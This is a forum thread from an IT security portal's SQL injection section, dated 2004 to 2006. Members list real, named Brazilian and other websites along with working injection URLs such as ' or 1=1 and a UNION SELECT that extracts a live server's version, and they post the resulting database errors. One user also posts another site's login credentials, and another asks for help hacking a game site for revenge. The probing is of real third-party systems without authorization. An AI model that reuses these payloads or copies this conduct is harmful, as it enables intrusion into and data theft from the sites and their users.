Waraxe IT Security Portal
Login or Register
July 27, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 204
Members: 0
Total: 204
Full disclosure
CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Some BRazililian sites with querystring vuln.
Post new topicReply to topic View previous topic :: View next topic

SQL Injection help u out in someway?
Yes
25%
25% [ 3 ]
Yes
25%
25% [ 3 ]
Special cases only
25%
25% [ 3 ]
Special cases only
25%
25% [ 3 ]
Not @ all
0%
0% [ 0 ]
Not @ all
0%
0% [ 0 ]
Total Votes : 12

Some BRazililian sites with querystring vuln.
PostPosted: Mon Jul 19, 2004 3:00 am Reply with quote
r0ot
Regular user
Regular user
Joined: Jul 18, 2004
Posts: 15




I tried google to gimme some asp sites using querystring as parameter input... I just realized that every site (except a little 1) from brazil is vuln. to sql injection.. wtf..bad programmers hahaha 0:-l

format of list is:

URL
DESCR
sep ---------

URL....



http://www.editoraerica.com.br/busca_cat.asp?procura='%20or%201=1


Microsoft OLE DB Provider for ODBC Drivers erro '80040e09'

[TCX][MyODBC]You have an error in your SQL syntax near '')or (subcategoria like '' or 1=1') order by nome ' at line 1

/busca_cat.asp, line 36

-----

http://www.buscaki.com.br/categorias.asp?cat='

Microsoft OLE DB Provider for ODBC Drivers error '80040e09'

[TCX][MyODBC]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

/categorias.asp, line 105


-----

http://www.graded.br/navega.asp?stt=125&cat='

HTTP 500.100 - Internal Server Error - ASP error

Technical Information (for support personnel)

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'cd_link = 125 AND cd_secao = ''.
/navega.asp, line 13


-----

http://www.abiquim.org.br/english/content.asp?princ='%20or%201=1

ADODB.Field error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

/english/content.asp, line 68


------

http://www.siemens.com.br/coluna1.asp?canal='%20or%20having%201=1

------

http://www.timaster.com.br/ext_raiox.asp?prof='&entrevista=nao

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ''.

/revista/raiox/raiox.asp, line 85

------

http://www.valoronline.com.br/valoreconomico/materia.asp?id='%20or%201=1

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' or 1=1'.

D:\DFS\SITES\VALORONLINE\VALORECONOMICO\../sql.asp, line 52

------

http://www.abong.org.br/novosite/links_pag.asp?link1='%20or%201=1

Microsoft OLE DB Provider for ODBC Drivers erro '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.

/novosite/links_pag.asp, line 136

------

http://www.infnet.com.br/curso/curso.asp?idcurso=15&idParceira='%20or%201=1

Microsoft VBScript runtime error '800a000d'

Type mismatch: 'Cint'

D:\DOMAINS\INFNET\CURSO\../include/menuglobal.asp, line 71

------

http://www.diariosp.com.br/informatica/default.asp?Editoria='%20or%201=1%20&id=292042&Retranca=292044

Microsoft VBScript runtime (0x800A000D)
Type mismatch: '[string: "' or 1=1 "]'
/informatica/default.asp, line 73

------

http://www.netlink.com.br/index.asp?p='%20or%201=1
Erro de tempo de execu??o do Microsoft VBScript erro '800a0009'
Subscrito fora do intervalo: '[number: 1]'

/index.asp, line 129

_________________
View user's profile Send private message
PostPosted: Mon Jul 19, 2004 9:49 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Good findings! I have seen hundreds of websites with sql injection holes - wind0ws, *nix, MySQL, M$ SQL, PostgreSql, Oracle - all the platforms are presented. But anyway, most easy is to find sql injection in ".jsp", ".cfm" and ".asp" scripts, because there is no magic_quotes Wink
Many webisites will try to hide sql injections and other holes in their p00r coded scripts and you see http 500 errors or just redirects to index page. And even in those cases big part of "protected" sites are affected by "blind" sql injection sploits - have done, and successfully Very Happy
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Jul 19, 2004 10:04 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Little addition:

http://www.abong.org.br/novosite/institucional/associadas_pagpubli4.asp?midia1=Folhetos'%20UNION%20ALL%20SELECT%20null,null,null,@@version,null,null,null,null,null,null,null,null,9999--

Busca por Publica??es - Tipo de m?dia: - M?dia

Folhetos - CEDAP: Teoria do Conhecimento e Educa??o Popular

Folhetos - CEDAP: - Elei??es/1988 e o Movimento Popular

Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) - :




Wink
View user's profile Send private message Send e-mail Visit poster's website
:):)
PostPosted: Tue Jul 20, 2004 1:24 pm Reply with quote
ernad
Regular user
Regular user
Joined: Jun 01, 2004
Posts: 13
Location: Serbia




Nice but this sites are not so big look at this www.playahead.com 20,000 online every time writen in asp try there sql injection Smile i think have many...
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Wed Jul 21, 2004 2:53 am Reply with quote
r0ot
Regular user
Regular user
Joined: Jul 18, 2004
Posts: 15




Its written in .net (using ASPX) pages, making hard job for sql inj. :/ thus.. btw wtf is site is that?

_________________
View user's profile Send private message
PostPosted: Thu Jul 22, 2004 12:47 am Reply with quote
ernad
Regular user
Regular user
Joined: Jun 01, 2004
Posts: 13
Location: Serbia




the is aspx sorry on my err they are in swdish this is my big rpoblem i`m register you can join in with username: tutinac and password: sandzak36320 in instlinger you have to write some stuffs in html and many thing what can be explitable wtf what is this you mean whata fu~ck is this site Smile one of the best sites in europe join in and watch on url maby you get some idea i`m trying so many times but everytime without luck or without idea how to do sql injection...

and waraxe why you dont try to work on aspx and asp there is new portal aspnuke they is writen in asp but like nuke they are same adress www.aspnuke.com this site download them i`m see them on one site but i cant to run them because i need some other db i dont know...

but is very nice
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Thu Jul 22, 2004 12:34 pm Reply with quote
r0ot
Regular user
Regular user
Joined: Jul 18, 2004
Posts: 15




Btw.. the fuck was a surprise cause i really dun know wat to do in the site ^^ not for offending or someth, sorry leh Very Happy


Btw, wats bout ? hehehehehe juz kidding

_________________
View user's profile Send private message
PostPosted: Sun Jul 25, 2004 12:59 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Well, i will look @ aspnuke soon. This is, what i got within first 20 seconds:

http://www.aspnuke.com/module/discuss/forum/thread.asp?topicid=2&threadid=-99999999


Code:


HTTP 500.100 - Internal Server Error - ASP error
Internet Information Services

Technical Information (for support personnel)

Error Type:
Microsoft VBScript runtime (0x800A0006)
Overflow: 'CInt'
D:\INETPUB\WWWROOT\ASPNUKE\MODULE\DISCUSS\FORUM\../../../lib/site_lib.asp, line 98


Browser Type:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

Page:
GET /module/discuss/forum/thread.asp

Time:
Sunday, July 25, 2004, 5:54:41 AM


More information:
Microsoft Support
View user's profile Send private message Send e-mail Visit poster's website
Hi i wanna only now if is possible to inj this site.
PostPosted: Tue Feb 08, 2005 11:39 pm Reply with quote
jonny
Beginner
Beginner
Joined: Feb 09, 2005
Posts: 1




Hi i was damage in this site: http://www.muonline.com from one guy that in game called me and said me that he has hacked my game account.

I know that there is a bug in the source code of this site to take user and pass information from db.
Sombody can hel me to find this sql inj to take my revenge?

tnx a lot
sorry for my little english
View user's profile Send private message
Re: Hi i wanna only now if is possible to inj this site.
PostPosted: Wed Feb 09, 2005 7:57 am Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




jonny wrote:
Hi i was damage in this site: http://www.muonline.com from one guy that in game called me and said me that he has hacked my game account.

I know that there is a bug in the source code of this site to take user and pass information from db.
Sombody can hel me to find this sql inj to take my revenge?

tnx a lot
sorry for my little english



Question not revenge for you, you have luck in scriptkiddies.com Question
View user's profile Send private message Visit poster's website
PostPosted: Wed Feb 16, 2005 7:50 pm Reply with quote
zer0-c00l
Advanced user
Advanced user
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!




stop fucking websites from my country Crying or Very sad Crying or Very sad Crying or Very sad
View user's profile Send private message
help!
PostPosted: Sun Mar 05, 2006 10:42 pm Reply with quote
sidnelsonplus
Beginner
Beginner
Joined: Mar 05, 2006
Posts: 1




who has some ideia to make sql here injection here? already I tried all things.. and the maximum that obtained was an overflow.


Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "9999 union all selec"]'

/shownews.asp, line 14


http://xxx.xxx.xxx/shownews.asp?id=9999%20union%20all%20select


MEMB_INFO is an table name...


edited by LINUX read the rules
View user's profile Send private message
Some BRazililian sites with querystring vuln.
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.136 Seconds